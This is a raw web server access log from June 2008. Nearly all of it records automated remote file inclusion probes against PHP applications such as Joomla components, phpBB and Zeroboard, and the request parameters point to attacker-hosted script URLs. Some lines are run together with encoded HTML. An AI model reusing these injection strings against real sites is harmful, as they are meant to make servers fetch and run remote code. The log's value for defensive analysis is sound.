213.215.67.3 - - [11/Jun/2008:11:39:12 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:39:13 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:39:13 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:39:18 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.102.113.158 - - [11/Jun/2008:11:39:18 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:39:19 -0700] "GET /logs/access_080225.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:39:20 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:39:20 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:39:24 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:39:28 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 200 18525 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:40:22 -0700] "GET /logs//language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:40:22 -0700] "GET //language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:11:41:37 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:11:41:38 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:11:41:38 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:11:42:09 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:11:42:35 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:11:42:35 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:11:42:36 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:42:50 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:11:43:21 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:43:45 -0700] "GET /logs/access_080106.log%3C/span%3E%20-%20%3Cem%3E368k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22zeroboard%22+org+%22zeroboard%22+org&u=www.dmulk.com/logs/access_080106.log&w=zeroboard+org+zeroboard+org&d=ENgNUZzfQz_W&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.saejowi.org/bbs/zboard.php?id=0702%22%20%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3Etotal%20:%201,%20page%20:%201%20/%201,%20connect%20:%200.%201%20<>%20%20%20%20(6.14%20/%20)%20.%202008/06/05.%206.%201.%20Copyright%201999-2008%20Zeroboard%20...%3C/div%3E%3Cspan%20class=url%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/span%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?joshprakash/us1:117.102.193.254.184.51 - - [11/Jun/2008:11:43:45 -0700] "GET /logs/access_080106.log%3C/span%3E%20-%20%3Cem%3E368k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22zeroboard%22+org+%22zeroboard%22+org&u=www.dmulk.com/logs/access_080106.log&w=zeroboard+org+zeroboard+org&d=ENgNUZzfQz_W&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.saejowi.org/bbs/zboard.php?id=0702%22%20%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3Etotal%20:%201,%20page%20:%201%20/%201,%20connect%20:%200.%201%20<>%20%20%20%20(6.14%20/%20)%20.%202008/06/05.%206.%201.%20Copyright%201999-2008%20Zeroboard%20...%3C/div%3E%3Cspan%20class=url%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/span%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?quynhthi1/us1:67.106.123193.254.184.51 - - [11/Jun/2008:11:43:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:43:46 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:43:47 -0700] "GET /logs/access_080106.log%3C/span%3E%20-%20%3Cem%3E368k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22zeroboard%22+org+%22zeroboard%22+org&u=www.dmulk.com/logs/access_080106.log&w=zeroboard+org+zeroboard+org&d=ENgNUZzfQz_W&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.saejowi.org/bbs/zboard.php?id=0702%22%20%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3Etotal%20:%201,%20page%20:%201%20/%201,%20connect%20:%200.%201%20<>%20%20%20%20(6.14%20/%20)%20.%202008/06/05.%206.%201.%20Copyright%201999-2008%20Zeroboard%20...%3C/div%3E%3Cspan%20class=url%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/span%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?cnsaskk10_25/us1:71.57.3193.254.184.51 - - [11/Jun/2008:11:43:47 -0700] "GET /logs/access_080106.log%3C/span%3E%20-%20%3Cem%3E368k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22zeroboard%22+org+%22zeroboard%22+org&u=www.dmulk.com/logs/access_080106.log&w=zeroboard+org+zeroboard+org&d=ENgNUZzfQz_W&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.saejowi.org/bbs/zboard.php?id=0702%22%20%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3Etotal%20:%201,%20page%20:%201%20/%201,%20connect%20:%200.%201%20<>%20%20%20%20(6.14%20/%20)%20.%202008/06/05.%206.%201.%20Copyright%201999-2008%20Zeroboard%20...%3C/div%3E%3Cspan%20class=url%3Ewww.saejowi.org/bbs/zboard.php?id=0702%3C/span%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?twintreesllc/us1:88.106.74.53.240.146 - - [11/Jun/2008:11:43:56 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:43:56 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:11:43:56 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:11:43:56 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:11:43:56 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:44:01 -0700] "GET /logs/access_080215.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:44:01 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:44:01 -0700] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:44:02 -0700] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [11/Jun/2008:11:44:08 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:44:13 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:44:13 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:44:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:11:44:39 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:45:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:11:45:12 -0700] "GET /logs/access_080313.log//lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:45:27 -0700] "GET /logs/access_080116.log//components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:45:27 -0700] "GET //components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:45:27 -0700] "GET /logs//components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:45:29 -0700] "GET /logs/access_080104.log//components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:46:18 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:46:18 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:46:19 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:46:26 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:46:26 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:47:01 -0700] "GET /logs//components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:11:47:01 -0700] "GET //components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:47:24 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:47:24 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:47:25 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:47:37 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:47:38 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:47:48 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:47:48 -0700] "GET /phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:47:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:47:54 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:48:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:48:20 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:48:24 -0700] "GET /logs/access_080118.log//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.193.199 - - [11/Jun/2008:11:48:44 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [11/Jun/2008:11:48:44 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [11/Jun/2008:11:48:44 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:49:06 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:11:49:06 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:11:49:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:11:49:09 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:11:49:10 -0700] "GET /errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:11:49:10 -0700] "GET /logs/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:15 -0700] "GET /logs/access_080105.log/help.php?css_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:15 -0700] "GET /help.php?css_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:16 -0700] "GET /logs/help.php?css_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:18 -0700] "GET /logs/access_080105.log/help.php?css_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:18 -0700] "GET /help.php?css_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:19 -0700] "GET /logs/help.php?css_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:49:21 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:49:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:11:49:34 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:11:49:34 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:11:49:35 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:56 -0700] "GET /logs/help.php?css_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:49:56 -0700] "GET /help.php?css_path=http://soesy.barcah.web.id/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.192.58.2 - - [11/Jun/2008:11:50:14 -0700] "GET /logs/access.log//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.192.58.2 - - [11/Jun/2008:11:50:15 -0700] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.192.58.2 - - [11/Jun/2008:11:50:15 -0700] "GET /logs//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.24.194.147 - - [11/Jun/2008:11:50:16 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 0 "http://images.google.nl/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/category/motorcycles/&h=3888&w=2592&sz=3750&hl=nl&start=54&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&prev=/images%3Fq%3Dhealthy%2Bbreakfast%26start%3D40%26gbv%3D2%26ndsp%3D20%26hl%3Dnl%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
213.22.193.50 - - [11/Jun/2008:11:50:17 -0700] "GET /logs/access_080329.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:50:22 -0700] "GET /logs/help.php?css_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [11/Jun/2008:11:50:22 -0700] "GET /help.php?css_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
